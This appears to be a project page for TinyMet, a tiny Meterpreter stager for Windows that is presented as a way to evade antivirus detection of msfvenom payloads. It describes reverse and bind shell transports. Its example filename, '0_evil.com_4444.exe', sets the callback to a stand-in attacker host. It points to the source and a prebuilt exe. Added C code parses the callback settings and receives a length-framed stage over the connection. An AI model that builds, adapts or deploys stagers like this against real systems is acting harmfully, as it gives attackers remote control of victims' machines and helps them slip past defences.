[TinyMet]

TinyMet is a tiny (about 4.5 kilobytes) and flexible meterpreter stager. It supports multiple meterpreter transports and lets you set LPORT and LHOST at runtime.

Transport, LPORT and LHOST are set during runtime through either of the following:

  • Command line arguments.
  • Naming the .exe file in a special way.

What’s new in v0.2:

  • tinymet can now parse the transport, LHOST and LPORT from its own filename, with the three values separated by underscores.
  • Example: “0_evil.com_4444.exe” will use reverse_tcp, LHOST=evil.com, LPORT=4444.
  • This makes tinymet friendlier for double-click, payload-like, argument-less use.

Available transports are as follows:

  • 0: reverse_tcp
  • 1: reverse_http
  • 2: reverse_https
  • 3: bind_tcp

Usage#1:

tinymet.exe TRANSPORT LHOST LPORT

Example: "tinymet.exe 2 host.com 443" will use reverse_https and connect to host.com:443


Usage#2: name the file using the following convention and run without args:

TRANSPORT_LHOST_LPORT.exe

Example: Setting the filename to "2_host.com_443.exe" and running it without arguments does exactly the same as Example#1.
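A worked parser for both conventions, added here as an example and not TinyMet's own code: portable C that reads the argument form and the filename form into one configuration struct, validates the transport index and the port, and strips a directory prefix and a case-insensitive .exe suffix before splitting on underscores. TinyMet itself avoids the C runtime and fetches its command line with GetCommandLineW()/CommandLineToArgvW(); this example uses ordinary argc/argv so it builds anywhere. The names (met_config, config_from_args, config_from_filename) and the decision to take the transport from the first underscore and the port from the last, so that an LHOST containing an underscore still parses, are this example's own choices.

```c
/* Added example, not TinyMet's own code: parse the two runtime configuration
 * conventions, "TRANSPORT LHOST LPORT" as arguments and
 * "TRANSPORT_LHOST_LPORT.exe" as the filename, into one config struct.
 * TinyMet gets its command line via GetCommandLineW()/CommandLineToArgvW();
 * this portable version uses plain argc/argv. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum transport { REVERSE_TCP = 0, REVERSE_HTTP = 1, REVERSE_HTTPS = 2, BIND_TCP = 3 };
static const char *transport_names[] = { "reverse_tcp", "reverse_http", "reverse_https", "bind_tcp" };

struct met_config {
    enum transport transport;
    char lhost[256];
    unsigned short lport;
};

/* Transport index: exactly one digit in 0..3. */
static int parse_transport(const char *s, size_t len, enum transport *out)
{
    if (len != 1 || s[0] < '0' || s[0] > '3')
        return 0;
    *out = (enum transport)(s[0] - '0');
    return 1;
}

/* TCP port: decimal, 1..65535, no trailing garbage. */
static int parse_port(const char *s, size_t len, unsigned short *out)
{
    unsigned long v = 0;
    if (len == 0 || len > 5)
        return 0;
    for (size_t i = 0; i < len; i++) {
        if (!isdigit((unsigned char)s[i]))
            return 0;
        v = v * 10 + (unsigned long)(s[i] - '0');
    }
    if (v == 0 || v > 65535)
        return 0;
    *out = (unsigned short)v;
    return 1;
}

static int set_lhost(const char *s, size_t len, struct met_config *cfg)
{
    if (len == 0 || len >= sizeof cfg->lhost)
        return 0;
    memcpy(cfg->lhost, s, len);
    cfg->lhost[len] = '\0';
    return 1;
}

/* Usage#1: tinymet.exe TRANSPORT LHOST LPORT */
int config_from_args(int argc, char **argv, struct met_config *cfg)
{
    if (argc != 4)
        return 0;
    return parse_transport(argv[1], strlen(argv[1]), &cfg->transport)
        && set_lhost(argv[2], strlen(argv[2]), cfg)
        && parse_port(argv[3], strlen(argv[3]), &cfg->lport);
}

/* Usage#2: TRANSPORT_LHOST_LPORT.exe, possibly with a directory prefix. The
 * transport is taken from the first underscore and the port from the last, so
 * an LHOST containing an underscore still parses (this example's choice). */
int config_from_filename(const char *path, struct met_config *cfg)
{
    const char *base = path, *first = NULL, *last = NULL, *p;
    static const char ext[] = ".exe";
    for (p = path; *p; p++)                    /* strip "dir/" or "dir\" */
        if (*p == '/' || *p == '\\')
            base = p + 1;
    size_t len = strlen(base);
    if (len > 4) {                             /* drop a ".exe"/".EXE" suffix */
        size_t i;
        for (i = 0; i < 4 && tolower((unsigned char)base[len - 4 + i]) == ext[i]; i++)
            ;
        if (i == 4)
            len -= 4;
    }
    for (p = base; p < base + len; p++)
        if (*p == '_') {
            if (!first) first = p;
            last = p;
        }
    if (!first || last == first)               /* need two separators */
        return 0;
    return parse_transport(base, (size_t)(first - base), &cfg->transport)
        && set_lhost(first + 1, (size_t)(last - first - 1), cfg)
        && parse_port(last + 1, (size_t)(base + len - last - 1), &cfg->lport);
}

int main(int argc, char **argv)
{
    struct met_config cfg;
    /* Explicit arguments win; otherwise fall back to the filename convention. */
    if (!config_from_args(argc, argv, &cfg) && !config_from_filename(argv[0], &cfg)) {
        fprintf(stderr, "usage: %s TRANSPORT LHOST LPORT, or rename to TRANSPORT_LHOST_LPORT.exe\n", argv[0]);
        return 1;
    }
    printf("transport=%s lhost=%s lport=%u\n", transport_names[cfg.transport], cfg.lhost, cfg.lport);
    return 0;
}
```

Run as `./tinymet 2 host.com 443` and it reports reverse_https/host.com/443; copy the binary to `2_host.com_443.exe` and run it with no arguments and you get the same result. A bad transport digit, a port outside 1..65535 or a name with fewer than two underscores is rejected rather than silently defaulted.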

TinyMet Source on Github

“compiled exe is also there in a zip file if you’re too lazy to create your own”


Some context for those who are interested

Evading antivirus remains a challenge for anyone using msfvenom to create stand-alone “exe” payloads, and no matter how hard one tries to achieve it with what is already in the framework, or with tools written by others, the results are largely unreliable.

I guess another way to approach the problem would be: 1) understand how the framework works, 2) write your own stager/payload.

  • Meterpreter is by design a “staged” payload: it consists of a “stager” and a “stage”. When msfvenom is used to create an exe, that exe is the stager part of meterpreter; when executed, it fetches the larger stage from exploit/multi/handler and does whatever is necessary to get it executed.
  • Stand-alone meterpreter executables created with msfvenom are not flexible in selecting the transport, LHOST or LPORT after being created, i.e. once you create the exe, you cannot change any of the settings you specified during creation.
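To make the stager/stage split concrete, here is the receive side of a reverse_tcp stager, added as an example rather than code from TinyMet or Metasploit. It follows the framing the classic Metasploit reverse_tcp stager and handler use: the handler sends a 4-byte little-endian stage length followed by the stage bytes, and the stager reads until it has all of them (the http/https transports fetch the stage as an HTTP response body instead). The read side is a callback so the code runs here against a constructed in-memory stream; the stage body, the MAX_STAGE limit and the function names are this example's assumptions, and the final step of placing the stage in executable memory and jumping to it is deliberately left out.

```c
/* Added example, not TinyMet's or Metasploit's code: the receive side of a
 * reverse_tcp stager. After connecting back, the stager reads a 4-byte
 * little-endian stage length, allocates a buffer and keeps reading until the
 * whole stage has arrived, coping with the short reads a TCP socket returns.
 * The transport is a read callback so the framing can be driven here from a
 * constructed in-memory stream instead of a real socket. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Returns bytes read (>0), 0 on EOF, <0 on error, like recv(). */
typedef int (*read_fn)(void *ctx, void *buf, size_t n);

/* Cap chosen for this example: whoever is listening on the port controls the
 * length field, so never allocate an unbounded amount on its say-so. */
#define MAX_STAGE (16u * 1024 * 1024)

static int read_exact(read_fn rd, void *ctx, uint8_t *buf, size_t n)
{
    size_t got = 0;
    while (got < n) {
        int r = rd(ctx, buf + got, n - got);
        if (r <= 0)
            return 0;            /* EOF or error before the stage was complete */
        got += (size_t)r;
    }
    return 1;
}

/* Fetch the stage. On success *stage/*stage_len hold a malloc'd copy; a real
 * stager would put it in executable memory and jump to it instead. */
int fetch_stage(read_fn rd, void *ctx, uint8_t **stage, uint32_t *stage_len)
{
    uint8_t hdr[4];
    if (!read_exact(rd, ctx, hdr, 4))
        return 0;
    uint32_t len = (uint32_t)hdr[0] | (uint32_t)hdr[1] << 8 |
                   (uint32_t)hdr[2] << 16 | (uint32_t)hdr[3] << 24;
    if (len == 0 || len > MAX_STAGE)
        return 0;
    uint8_t *buf = malloc(len);
    if (!buf)
        return 0;
    if (!read_exact(rd, ctx, buf, len)) {
        free(buf);
        return 0;
    }
    *stage = buf;
    *stage_len = len;
    return 1;
}

/* Constructed in-memory "handler": hands out at most `chunk` bytes per call
 * to mimic a socket delivering the stage in fragments. */
struct mem_stream { const uint8_t *data; size_t len, pos, chunk; };

static int mem_read(void *ctx, void *buf, size_t n)
{
    struct mem_stream *s = ctx;
    size_t left = s->len - s->pos;
    if (left == 0)
        return 0;
    if (n > s->chunk) n = s->chunk;
    if (n > left) n = left;
    memcpy(buf, s->data + s->pos, n);
    s->pos += n;
    return (int)n;
}

/* Handler side of the framing: 4-byte little-endian length, then the stage. */
size_t frame_stage(const uint8_t *body, uint32_t body_len, uint8_t *out)
{
    out[0] = body_len & 0xff;         out[1] = (body_len >> 8) & 0xff;
    out[2] = (body_len >> 16) & 0xff; out[3] = (body_len >> 24) & 0xff;
    memcpy(out + 4, body, body_len);
    return 4 + body_len;
}

/* Deliver a framed (constructed, non-executable) stage `chunk` bytes at a
 * time; returns 1 if the stager recovers exactly the original body. */
int demo_roundtrip(size_t chunk)
{
    static const uint8_t body[] = "constructed stage bytes, not real code";
    uint8_t msg[64];
    size_t msg_len = frame_stage(body, sizeof body, msg);
    struct mem_stream s = { msg, msg_len, 0, chunk };
    uint8_t *stage; uint32_t stage_len;
    if (!fetch_stage(mem_read, &s, &stage, &stage_len))
        return 0;
    int ok = stage_len == sizeof body && memcmp(stage, body, stage_len) == 0;
    free(stage);
    return ok;
}

/* Truncated delivery: the handler disconnects before the full stage arrives. */
int demo_truncated(void)
{
    static const uint8_t body[] = "constructed stage bytes, not real code";
    uint8_t msg[64];
    size_t msg_len = frame_stage(body, sizeof body, msg);
    struct mem_stream s = { msg, msg_len - 5, 0, 16 };
    uint8_t *stage; uint32_t stage_len;
    return fetch_stage(mem_read, &s, &stage, &stage_len);   /* expected: 0 */
}
```

Two details worth carrying into a real stager: never assume one recv() returns the whole header or body, and bound the length before allocating, because anything listening on that port can send the length field.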

Compiling from source

Why are you not using argc and *argv[] to parse the command line?!

  • To bring the size down, all default libraries need to be removed.
  • Downside: those default libraries (the C runtime startup code) are what populate argc and argv, which is why the Win32 APIs `GetCommandLineW()` and `CommandLineToArgvW()` are used instead.

… I was learning assembly and reversing in general by writing code in C, compiling it, then reversing it to see what it looks like, and started with my other project “ultimet” … then thought about doing something useful along the way; that’s how tinymet was born.

Comments are welcome 🙂